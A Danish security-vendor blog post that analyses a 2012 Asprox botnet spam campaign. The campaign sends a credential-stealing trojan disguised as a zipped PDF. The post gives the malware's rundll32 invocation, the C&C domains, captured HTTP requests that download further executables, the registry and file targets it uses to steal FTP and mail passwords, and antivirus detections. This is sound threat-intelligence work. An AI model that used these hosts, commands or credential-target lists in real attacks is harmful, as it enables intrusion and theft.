Det har været en travl dag på kontoret. Vi har set flere spamkampagner blive skudt igang fra bl.a. Asprox BOTnettet og med forskelligt indhold. Et eksempel på en af de mere aggressive kampagner findes herunder:
Den vedhæftede fil, som modtageren skal lokkes til at åbne hedder "ACH_Report-CFA2FFEE94.pdf.zip". Zip-filen indeholder en binær kode, som ved kørsel vil inficere maskinen. Hvis man kigger i filegenskaberne opdager man hurtigt at bagmændene ikke er helt uden humor:
CompanyName
Weekfish
FileDescription
Weekfishtail
FileVersion
7.5.691.73
LegalCopyright
Copyright
2012
InternalName
SpellMake
OriginalFilename
Food.exe
ProductName
WeekfishWell
Koden er udviklet i Visual C++, med følgende kompileringsdato: "Fri Nov 2 06:29:33 2012 UTC" og indeholder mange uønskede funktioner.
Ved kørsel vil den injekte sig i iexplore.exe processen: C:Documents and SettingsAdministratorApplication Datarapini.dll -> C:Program FilesInternet Exploreriexplore.exe, som den så anvender til at forbinde sig til en C&C server hvorfra der trækkes supplerende malware. DLL'en køres på systemet igennem en rundll der spawnes med følgende kald:
"rundll32.exe C:Documents and SettingsAdministratorApplication Datarapini.dll BuildNotificationPackage"
Den kopierer sig endvidere til systemet til følgende sti:
C:Documents and SettingsAdministratorApplication DataErypycpi.exe
I forbindelse med kommunikation med de centrale C&C servere blev følgende kontaktet af malwaren:
josemarmolclub.com.ar
aasamant.com
matheusilva.com
alispide.net
sanalturtr.com
rdquark.com
fundepalma.org
At der downloades supplerende malware kan dokumenteres med nedenstående (mellemrum indlagt af CSIS):
GET /hr5JHr1.exe HTTP/1.0
Host: fundepalma.org
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
GET /ttmX4XF.exe HTTP/1.0
Host: matheusilva.com
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
GET /V61zmw.exe HTTP/1.0
Host: alispide.net
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Det matcher meget godt funktionen, som også afsløres i den binære kode:
Denne kampagne har til formål at binde den inficerede maskine ind i et BOTnet og herfra systematisk udtrække sensitive oplysninger herunder FTP brugernavne og passwords:
SoftwareVanDykeSecureFX
IMAP User
nintendo
Yandex
SoftwareMicrosoftWindows NTCurrentVersionWindows Messaging SubsystemProfilesMicrosoft Outlook Internet Settings
WinFTP
PopServer
PopAccount
sites.xml
Login
POP3 User
SoftwareSotaFFFTPOptions
SoftwareBulletProof SoftwareBulletProof FTP ClientMain
MozillaSeaMonkey
fireFTPsites.dat
FreshFTP
Pocomail
inetcomm server passwords
FTPList.db
Comodo
ServerName
SoftwareFTP ExplorerProfiles
SoftwareRITThe Bat!Users depot
ChromePlus
SoftwareFTPWareCOREFTPSites
GlobalSCAPECuteFTP Pro
[..]
C&C serverne, hvorfra der trækkes supplerende malware, er hardkodet i den binære kode:
Vi har blokeret for samtlige domæner i CSIS Secure DNS og yder derved også beskyttelse igennem Heimdal Security Agent PRO og Corporate.
Den skadelige kode opnår følgende antivirus detektion:
Antivirus Result Update
Agnitum - 20121109
AhnLab-V3 Win-Trojan/Downloader.178688.O 20121109
AntiVir TR/Bredo.EB.1 20121109
Antiy-AVL - 20121108
Avast - 20121109
AVG - 20121109
BitDefender - 20121109
ByteHero - 20121107
CAT-QuickHeal - 20121109
ClamAV - 20121108
Commtouch - 20121109
Comodo - 20121109
DrWeb Trojan.PWS.Stealer.946 20121109
Emsisoft Trojan.Win32.Agent.AMN (A) 20121109
eSafe - 20121107
ESET-NOD32 Win32/PSW.Agent.NTM 20121109
F-Prot - 20121109
F-Secure - 20121109
Fortinet - 20121109
GData - 20121109
Ikarus Trojan-PWS.Win32.Tepfer 20121109
Jiangmin - 20121109
K7AntiVirus Trojan 20121109
Kaspersky UDS:DangerousObject.Multi.Generic 20121109
Kingsoft Win32.Malware.Generic.a.(kcloud) 20121105
McAfee - 20121109
McAfee-GW-Edition - 20121109
Microsoft - 20121109
MicroWorld-eScan - 20121109
Norman - 20121108
nProtect - 20121109
Panda - 20121109
PCTools Trojan.Fakeavlock 20121109
Rising - 20121109
Sophos Troj/Bredo-ADK 20121109
SUPERAntiSpyware - 20121109
Symantec Trojan.Fakeavlock 20121109
TheHacker - 20121107
TotalDefense - 20121108
TrendMicro - 20121109
TrendMicro-HouseCall TSPY_ZBOT.GEL 20121109
VBA32 - 20121109
VIPRE - 20121109
ViRobot - 20121109